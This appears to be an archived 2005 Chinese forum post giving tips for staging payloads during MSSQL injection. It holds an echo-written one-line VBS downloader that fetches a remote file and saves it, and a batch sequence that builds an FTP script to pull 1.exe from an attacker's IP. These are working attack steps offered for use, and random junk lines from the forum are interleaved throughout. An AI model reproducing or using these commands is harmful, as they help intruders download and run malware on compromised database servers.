数学建模社区-数学中国
标题:
mssql注射时不可以多次echo的解决办法
[打印本页]
作者:
韩冰
时间:
2005-1-23 13:30
标题:
mssql注射时不可以多次echo的解决办法
<
>解决办法:
" K# h: w2 m I4 G _) I; @0 G
1.iget.vbs一次写入
) p6 B. ^: Y7 s7 |- U0 |
在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写
. c3 `1 B( a( n, K/ C D
. G3 T$ W; E) Z h5 ]: K4 m
Set x= CreateObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject("ADODB.Stream"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2
4 E. e( y+ t' q' {
, }2 T, W$ C+ ]' u% K
这样我们可以一次echo成功,echo版本:
$ Z* t; H. C* l" V+ _1 C Z
4 d/ G4 e9 ?+ U: V
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >iget.vbs
- X' _% ?7 J) m0 A# O& ]- |
. h7 G' {# o/ f. A; F' W$ C# u4 G" C
7 j: J& j4 Z0 T, g3 k4 {% q3 L
2.bat调用ftp脚本的写法(by envymask)
/ D5 d% F4 P p
: Q# Y# [* m% J5 E
echo ftp>1.vbs
$ ~) X, T' y4 G3 S
echo open ip>2.vbs
! i: i$ Q+ ^2 U( \' j, e
echo u>3.vbs
; B% ]! j, @( g4 I- y! M
echo s>4.vbs
) A: O9 L6 j! ~; |' a( B
echo binary>5.vbs
+ K: B7 c x) g7 N, E
echo get 1.exe>6.vbs
- p, P2 K( ?! z1 n% _
echo bay>7.vbs
6 v. [" w3 W" o
# Y) m7 s: I2 W( _0 h
copy 1.vbs+2.vbs+3.vbs+4.vbs+5.vbs+6.vbs+7.vbs new.vbs
) ~: _7 B$ h9 Y3 \1 w
</P>
欢迎光临 数学建模社区-数学中国 (http://www.madio.net/)
Powered by Discuz! X2.5
>解决办法: " K# h: w2 m I4 G _) I; @0 G